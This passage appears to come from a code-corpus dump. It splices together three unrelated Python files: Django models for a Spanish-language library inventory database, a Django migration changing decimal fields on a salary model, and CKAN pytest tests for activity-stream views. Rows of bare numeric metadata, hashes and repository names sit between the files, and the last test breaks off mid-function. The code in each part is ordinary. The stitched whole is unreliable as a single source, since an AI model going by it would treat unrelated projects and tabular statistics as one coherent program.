total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'issue'
class Libros(models.Model):
idinventario_libros = models.PositiveIntegerField(primary_key=True)
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'libros'
class Cd(models.Model):
idinventario_cd = models.PositiveIntegerField(primary_key=True)
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'cd'
class Inventario(models.Model):
idinventario = models.AutoField(primary_key=True)
idinventario_libros = models.ForeignKey('Libros', models.DO_NOTHING, db_column='idinventario_libros')
idinventario_issue = models.ForeignKey('Issue', models.DO_NOTHING, db_column='idinventario_issue')
idinventario_cd = models.ForeignKey(Cd, models.DO_NOTHING, db_column='idinventario_cd')
idinventario_resp = models.ForeignKey('Resp', models.DO_NOTHING, db_column='idinventario_resp')
nombre_inventario = models.CharField(max_length=50)
f_inicio = models.DateTimeField()
f_termino = models.DateTimeField()
f_informe = models.DateTimeField()
class Meta:
managed = False
db_table = 'inventario'
class Registra(models.Model):
idregistro = models.AutoField(primary_key=True)
idusuario = models.ForeignKey('Usuario', models.DO_NOTHING, db_column='idusuario')
idinventario = models.ForeignKey(Inventario, models.DO_NOTHING, db_column='idinventario')
fecha_registro = models.DateTimeField()
class Meta:
managed = False
db_table = 'registra'
class HistorialCd(models.Model):
id_historial_c = models.AutoField(primary_key=True)
idinventario_cd = models.ForeignKey(Cd, models.DO_NOTHING, db_column='idinventario_cd')
total_items = models.PositiveIntegerField()
total_items_inventariados = models.PositiveIntegerField()
total_items_en_prestamos_permanente = models.PositiveIntegerField()
total_items_en_morosos_alumnos = models.PositiveIntegerField()
total_items_morosos_academicos = models.PositiveIntegerField()
total_items_morosos_funcionarios = models.PositiveIntegerField()
total_items_morosos_postgrado = models.PositiveIntegerField()
total_items_morosos_pib = models.PositiveIntegerField()
total_items_extraviados = models.PositiveIntegerField()
total_items_perdidos = models.PositiveIntegerField()
total_items_inutilizados = models.PositiveIntegerField()
total_items_deteriorados_para_empastar = models.PositiveIntegerField()
total_items_transito = models.PositiveIntegerField()
total_items_problemas_de_catalogacion = models.PositiveIntegerField()
total_items_faltantes = models.PositiveIntegerField()
class Meta:
managed = False
db_table = 'historial_cd'
class HistorialIssue(models.Model):
id_historial_i = models.AutoField(primary_key=True)
idinventario_issue = models.ForeignKey('Issue', models.DO_NOTHING, db_column='idinventario_issue')
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'historial_issue'
class HistorialLibros(models.Model):
id_historial_l = models.AutoField(db_column='id_historial_L', primary_key=True) # Field name made lowercase.
idinventario_libros = models.ForeignKey('Libros', models.DO_NOTHING, db_column='idinventario_libros')
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'historial_libros'
class HistorialResp(models.Model):
id_historial_r = models.AutoField(primary_key=True)
idinventario_resp = models.ForeignKey('Resp', models.DO_NOTHING, db_column='idinventario_resp')
total_items = models.PositiveIntegerField()
total_items_inventariados = models.PositiveIntegerField()
total_items_en_prestamos_permanente = models.PositiveIntegerField()
total_items_en_morosos_alumnos = models.PositiveIntegerField()
total_items_morosos_academicos = models.PositiveIntegerField()
total_items_morosos_funcionarios = models.PositiveIntegerField()
total_items_morosos_postgrado = models.PositiveIntegerField()
total_items_morosos_pib = models.PositiveIntegerField()
total_items_extraviados = models.PositiveIntegerField()
total_items_perdidos = models.PositiveIntegerField()
total_items_inutilizados = models.PositiveIntegerField()
total_items_deteriorados_para_empastar = models.PositiveIntegerField()
total_items_transito = models.PositiveIntegerField()
total_items_problemas_de_catalogacion = models.PositiveIntegerField()
total_items_faltantes = models.PositiveIntegerField()
class Meta:
managed = False
db_table = 'historial_resp'
class Edita(models.Model):
id = models.AutoField(primary_key=True)
idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
id_historial_c = models.ForeignKey(HistorialCd, models.DO_NOTHING, db_column='id_historial_c')
fecha_registro = models.DateTimeField()
class Meta:
managed = False
db_table = 'edita'
class Modifica(models.Model):
id = models.AutoField(primary_key=True)
idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
id_historial_i = models.ForeignKey(HistorialIssue, models.DO_NOTHING, db_column='id_historial_i')
fecha_registro = models.DateTimeField()
class Meta:
managed = False
db_table = 'modifica'
class Cambia(models.Model):
id = models.AutoField(primary_key=True)
idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
id_historial_l = models.ForeignKey(HistorialLibros, models.DO_NOTHING, db_column='id_historial_l')
fecha_registro = models.DateTimeField()
class Meta:
managed = False
db_table = 'cambia'
class Actualiza(models.Model):
id = models.AutoField(primary_key=True)
idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
id_historial_r = models.ForeignKey('HistorialResp', models.DO_NOTHING, db_column='id_historial_r')
fecha_registro = models.DateTimeField()
class Meta:
managed = False
db_table = 'actualiza'
| 41.878689
| 113
| 0.767635
| 1,402
| 12,773
| 6.651926
| 0.108417
| 0.128673
| 0.207163
| 0.252198
| 0.845057
| 0.818036
| 0.799164
| 0.779863
| 0.7641
| 0.7641
| 0
| 0.002399
| 0.151413
| 12,773
| 304
| 114
| 42.016447
| 0.858013
| 0.037579
| 0
| 0.72541
| 1
| 0
| 0.034028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0.004098
| 0.004098
| 0.008197
| 0.868852
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
1b894170f01ed69b285ff953828dc42cbccc4bf8
| 1,540
|
py
|
Python
|
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2020-09-25 20:35
from django.db import migrations, models
import salary.models
class Migration(migrations.Migration):
dependencies = [
('salary', '0015_remove_salary_id'),
]
operations = [
migrations.AlterField(
model_name='salary',
name='basic',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
migrations.AlterField(
model_name='salary',
name='da',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
migrations.AlterField(
model_name='salary',
name='ea',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
migrations.AlterField(
model_name='salary',
name='hra',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
migrations.AlterField(
model_name='salary',
name='pa',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
migrations.AlterField(
model_name='salary',
name='total',
field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
),
]
| 34.222222
| 115
| 0.615584
| 157
| 1,540
| 5.866242
| 0.267516
| 0.091205
| 0.162866
| 0.188925
| 0.801303
| 0.801303
| 0.758958
| 0.758958
| 0.758958
| 0.758958
| 0
| 0.031858
| 0.266234
| 1,540
| 44
| 116
| 35
| 0.783186
| 0.027922
| 0
| 0.631579
| 1
| 0
| 0.05485
| 0.014047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9410f34560e399046b37accbd06a647c58cf48ff
| 38,254
|
py
|
Python
|
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest.mock as mock
from datetime import datetime
import pytest
from bs4 import BeautifulSoup
import ckan.model as model
import ckan.lib.dictization as dictization
from ckan.lib.helpers import url_for
from ckan.tests import factories, helpers
from ckanext.activity.model import Activity, activity as activity_model
from ckanext.activity.logic.validators import object_id_validators
def _clear_activities():
model.Session.query(Activity).delete()
model.Session.flush()
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestOrganization(object):
def test_simple(self, app):
"""Checking the template shows the activity stream."""
user = factories.User()
org = factories.Organization(user=user)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
assert user["fullname"] in response
assert "created the organization" in response
def test_create_organization(self, app):
user = factories.User()
org = factories.Organization(user=user)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the organization" in response
assert (
'<a href="/organization/{}">{}'.format(org["name"], org["title"])
in response
)
def test_change_organization(self, app):
user = factories.User()
org = factories.Organization(user=user)
_clear_activities()
org["title"] = "Organization with changed title"
helpers.call_action(
"organization_update", context={"user": user["name"]}, **org
)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the organization" in response
assert (
'<a href="/organization/{}">Organization with changed title'
.format(org["name"])
in response
)
def test_delete_org_using_organization_delete(self, app):
user = factories.User()
org = factories.Organization(user=user)
_clear_activities()
helpers.call_action(
"organization_delete", context={"user": user["name"]}, **org
)
url = url_for("activity.organization_activity", id=org["id"])
env = {"REMOTE_USER": user["name"]}
app.get(url, extra_environ=env, status=404)
# organization_delete causes the Member to state=deleted and then the
# user doesn't have permission to see their own deleted Organization.
# Therefore you can't render the activity stream of that org. You'd
# hope that organization_delete was the same as organization_update
# state=deleted but they are not...
def test_delete_org_by_updating_state(self, app):
user = factories.User()
org = factories.Organization(user=user)
_clear_activities()
org["state"] = "deleted"
helpers.call_action(
"organization_update", context={"user": user["name"]}, **org
)
url = url_for("activity.organization_activity", id=org["id"])
env = {"REMOTE_USER": user["name"]}
response = app.get(url, extra_environ=env)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the organization" in response
assert (
'<a href="/organization/{}">{}'.format(org["name"], org["title"])
in response
)
def test_create_dataset(self, app):
user = factories.User()
org = factories.Organization()
_clear_activities()
dataset = factories.Dataset(owner_org=org["id"], user=user)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_change_dataset(self, app):
user = factories.User()
org = factories.Organization()
dataset = factories.Dataset(owner_org=org["id"], user=user)
_clear_activities()
dataset["title"] = "Dataset with changed title"
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_delete_dataset(self, app):
user = factories.User()
org = factories.Organization()
dataset = factories.Dataset(owner_org=org["id"], user=user)
_clear_activities()
helpers.call_action(
"package_delete", context={"user": user["name"]}, **dataset
)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestUser:
def test_simple(self, app):
"""Checking the template shows the activity stream."""
user = factories.User()
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert user["fullname"] in response
assert "signed up" in response
def test_create_user(self, app):
user = factories.User()
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "signed up" in response
def test_change_user(self, app):
user = factories.User()
_clear_activities()
user["fullname"] = "Mr. Changed Name"
helpers.call_action(
"user_update", context={"user": user["name"]}, **user
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated their profile" in response
def test_create_dataset(self, app):
user = factories.User()
_clear_activities()
dataset = factories.Dataset(user=user)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_change_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["title"] = "Dataset with changed title"
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_delete_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
helpers.call_action(
"package_delete", context={"user": user["name"]}, **dataset
)
url = url_for("activity.user_activity", id=user["id"])
env = {"REMOTE_USER": user["name"]}
response = app.get(url, extra_environ=env)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_create_group(self, app):
user = factories.User()
group = factories.Group(user=user)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".group")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the group" in response
assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert group["title"] in href.text.strip()
def test_change_group(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
group["title"] = "Group with changed title"
helpers.call_action(
"group_update", context={"user": user["name"]}, **group
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".group")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the group" in response
assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert group["title"] in href.text.strip()
def test_delete_group_using_group_delete(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
helpers.call_action(
"group_delete", context={"user": user["name"]}, **group
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".group")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the group" in response
assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert group["title"] in href.text.strip()
def test_delete_group_by_updating_state(self, app):
user = factories.User()
group = factories.Group(user=user)
_clear_activities()
group["state"] = "deleted"
helpers.call_action(
"group_update", context={"user": user["name"]}, **group
)
url = url_for("activity.group_activity", id=group["id"])
env = {"REMOTE_USER": user["name"]}
response = app.get(url, extra_environ=env)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the group" in response
assert (
'<a href="/group/{}">{}'.format(group["name"], group["title"])
in response
)
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("clean_db", "with_plugins")
class TestPackage:
def test_simple(self, app):
"""Checking the template shows the activity stream."""
user = factories.User()
dataset = factories.Dataset(user=user)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
assert user["fullname"] in response
assert "created the dataset" in response
def test_create_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_change_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["title"] = "Dataset with changed title"
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_create_tag_directly(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["tags"] = [{"name": "some_tag"}]
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
assert len(activities) == 1
def test_create_tag(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["tags"] = [{"name": "some_tag"}]
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
assert len(activities) == 1
def test_create_extra(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["extras"] = [{"key": "some", "value": "extra"}]
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
assert len(activities) == 1
def test_create_resource(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
helpers.call_action(
"resource_create",
context={"user": user["name"]},
name="Test resource",
package_id=dataset["id"],
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
assert len(activities) == 1
def test_update_resource(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
resource = factories.Resource(package_id=dataset["id"])
_clear_activities()
helpers.call_action(
"resource_update",
context={"user": user["name"]},
id=resource["id"],
name="Test resource updated",
package_id=dataset["id"],
)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
activities = helpers.call_action(
"package_activity_list", id=dataset["id"]
)
assert len(activities) == 1
def test_delete_dataset(self, app):
user = factories.User()
org = factories.Organization()
dataset = factories.Dataset(owner_org=org["id"], user=user)
_clear_activities()
helpers.call_action(
"package_delete", context={"user": user["name"]}, **dataset
)
url = url_for("activity.organization_activity", id=org["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_admin_can_see_old_versions(self, app):
user = factories.User()
env = {"REMOTE_USER": user["name"]}
dataset = factories.Dataset(user=user)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url, extra_environ=env)
assert "View this version" in response
def test_public_cant_see_old_versions(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
assert "View this version" not in response
def test_admin_can_see_changes(self, app):
user = factories.User()
env = {"REMOTE_USER": user["name"]}
dataset = factories.Dataset() # activities by system user aren't shown
dataset["title"] = "Changed"
helpers.call_action("package_update", **dataset)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url, extra_environ=env)
assert "Changes" in response
def test_public_cant_see_changes(self, app):
dataset = factories.Dataset() # activities by system user aren't shown
dataset["title"] = "Changed"
helpers.call_action("package_update", **dataset)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
assert "Changes" not in response
# ckanext-canada uses their IActivity to add their custom activity to the
# list of validators: https://github.com/open-data/ckanext-canada/blob/6870e5bc38a04aa8cef191b5e9eb361f9560872b/ckanext/canada/plugins.py#L596
# but it's easier here to just hack patch it in
@mock.patch(
"ckanext.activity.logic.validators.object_id_validators",
dict(
list(object_id_validators.items())
+ [("changed datastore", "package_id_exists")]
),
)
def test_custom_activity(self, app):
"""Render a custom activity"""
user = factories.User()
organization = factories.Organization(
users=[{"name": user["id"], "capacity": "admin"}]
)
dataset = factories.Dataset(owner_org=organization["id"], user=user)
resource = factories.Resource(package_id=dataset["id"])
_clear_activities()
# Create a custom Activity object. This one is inspired by:
# https://github.com/open-data/ckanext-canada/blob/master/ckanext/canada/activity.py
activity_dict = {
"user_id": user["id"],
"object_id": dataset["id"],
"activity_type": "changed datastore",
"data": {
"resource_id": resource["id"],
"pkg_type": dataset["type"],
"resource_name": "june-2018",
"owner_org": organization["name"],
"count": 5,
},
}
helpers.call_action("activity_create", **activity_dict)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
# it renders the activity with fallback.html, since we've not defined
# changed_datastore.html in this case
assert "changed datastore" in response
def test_redirect_also_with_activity_parameter(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
activity = activity_model.package_activity_list(
dataset["id"], limit=1, offset=0
)[0]
# view as an admin because viewing the old versions of a dataset
sysadmin = factories.Sysadmin()
env = {"REMOTE_USER": sysadmin["name"]}
response = app.get(
url_for(
"activity.package_history",
id=dataset["id"],
activity_id=activity.id,
),
status=302,
extra_environ=env,
follow_redirects=False,
)
expected_path = url_for(
"activity.package_history",
id=dataset["name"],
_external=True,
activity_id=activity.id,
)
assert response.headers["location"] == expected_path
def test_read_dataset_as_it_used_to_be(self, app):
dataset = factories.Dataset(title="Original title")
activity = (
model.Session.query(Activity)
.filter_by(object_id=dataset["id"])
.one()
)
dataset["title"] = "Changed title"
helpers.call_action("package_update", **dataset)
sysadmin = factories.Sysadmin()
env = {"REMOTE_USER": sysadmin["name"]}
response = app.get(
url_for(
"activity.package_history",
id=dataset["name"],
activity_id=activity.id,
),
extra_environ=env,
)
assert helpers.body_contains(response, "Original title")
def test_read_dataset_as_it_used_to_be_but_is_unmigrated(self, app):
# Renders the dataset using the activity detail, when that Activity was
# created with an earlier version of CKAN, and it has not been migrated
# (with migrate_package_activity.py), which should give a 404
user = factories.User()
dataset = factories.Dataset(user=user)
# delete the modern Activity object that's been automatically created
modern_activity = (
model.Session.query(Activity)
.filter_by(object_id=dataset["id"])
.one()
)
modern_activity.delete()
# Create an Activity object as it was in earlier versions of CKAN.
# This code is based on:
# https://github.com/ckan/ckan/blob/b348bf2fe68db6704ea0a3e22d533ded3d8d4344/ckan/model/package.py#L508
activity_type = "changed"
dataset_table_dict = dictization.table_dictize(
model.Package.get(dataset["id"]), context={"model": model}
)
activity = Activity(
user_id=user["id"],
object_id=dataset["id"],
activity_type="%s package" % activity_type,
data={
# "actor": a legacy activity had no "actor"
# "package": a legacy activity had just the package table,
# rather than the result of package_show
"package": dataset_table_dict
},
)
model.Session.add(activity)
sysadmin = factories.Sysadmin()
env = {"REMOTE_USER": sysadmin["name"]}
app.get(
url_for(
"activity.package_history",
id=dataset["name"],
activity_id=activity.id,
),
extra_environ=env,
status=404,
)
def test_changes(self, app):
user = factories.User()
dataset = factories.Dataset(title="First title", user=user)
dataset["title"] = "Second title"
helpers.call_action("package_update", **dataset)
activity = activity_model.package_activity_list(
dataset["id"], limit=1, offset=0
)[0]
env = {"REMOTE_USER": user["name"]}
response = app.get(
url_for("activity.package_changes", id=activity.id),
extra_environ=env,
)
assert helpers.body_contains(response, "First")
assert helpers.body_contains(response, "Second")
@pytest.mark.ckan_config("ckan.activity_list_limit", "3")
def test_invalid_get_params(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
url = url_for("activity.package_activity", id=dataset["id"])
response = app.get(url, query_string={"before": "XXX"}, status=400)
assert "Invalid parameters" in response.body
@pytest.mark.ckan_config("ckan.activity_list_limit", "3")
def test_next_page_button(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
dataset["title"] = "Second title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "Third title"
helpers.call_action("package_update", **dataset)
dataset["title"] = "Fourth title"
helpers.call_action("package_update", **dataset)
